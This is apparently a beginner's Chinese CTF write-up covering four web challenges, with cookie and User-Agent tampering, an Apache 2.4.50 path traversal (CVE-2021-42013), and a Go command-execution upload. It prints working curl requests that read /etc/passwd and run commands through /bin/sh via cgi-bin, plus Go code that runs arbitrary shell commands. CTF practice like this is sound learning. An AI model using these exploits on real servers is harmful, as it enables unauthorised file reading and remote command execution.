大佬们都在努力,我个小白也不能落下加油!!!
Power Cookie
打开界面,额用游客的方式登录,点一下
啥都没有,一般这样的题都是抓包改一下,cookie的值或者x-forwarded-for等
提示admin那就是cookie
试了一下,发现cookie admin=1就可以了
魔法浏览器
没啥思路,还是看一下源码扒
hex编码,解码一下,
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75
log
然后改一下文件User-Agent
就可以获得flag
getme
打开页面<!-- pwd:/usr/local/apache2/ -->,就这一个目录信息
一个字,蒙!
然后burp扫一下,发现
搜索一下Apache/2.4.50 (Unix),
Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)
漏洞利用poc:
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
可以查看任意文件
说明存在漏洞
目标服务器开启cgi或者cgid时候,可以命令执行
curl -v --data "echo;命令" '目标地址:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
或者
GET :
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
POST:
echo Content-Type: text/plain; echo;ls /
不知道什么原因, 不返回值,可是看其他wp就是这样,然后就出来目录,接着探索,可能是我burp出错了,调试一下。
hackme
打开界面发现最下面可以点击,那点击进去
发现可能每一个链接中有一个文件,而每一个对应的文件中执行了一条命令。像上面的whoami、pwd等等。
看到这然后,go语言目前还没学到,先简单了解一下,Go语言中用 os/exec 执行命令的五种姿势 - 知乎需要上传个uers文件,然后他就会进行go的解析
package main
import (
"fmt"
"os/exec"
)
func main() {
Command("ls /") 执行的命令
}
func Command(cmd string) error {
c := exec.Command("bash", "-c", cmd)
output, err := c.CombinedOutput()
fmt.Println(string(output))
return err
}
最后发现flag,用cat /flag 代替上面语句中的ls /即可查找到flag。所以这个题看似其实不完全考到go即使不是很懂go语言,考的是go脚本。
后面俩道题,实现是能力,不够,继续学习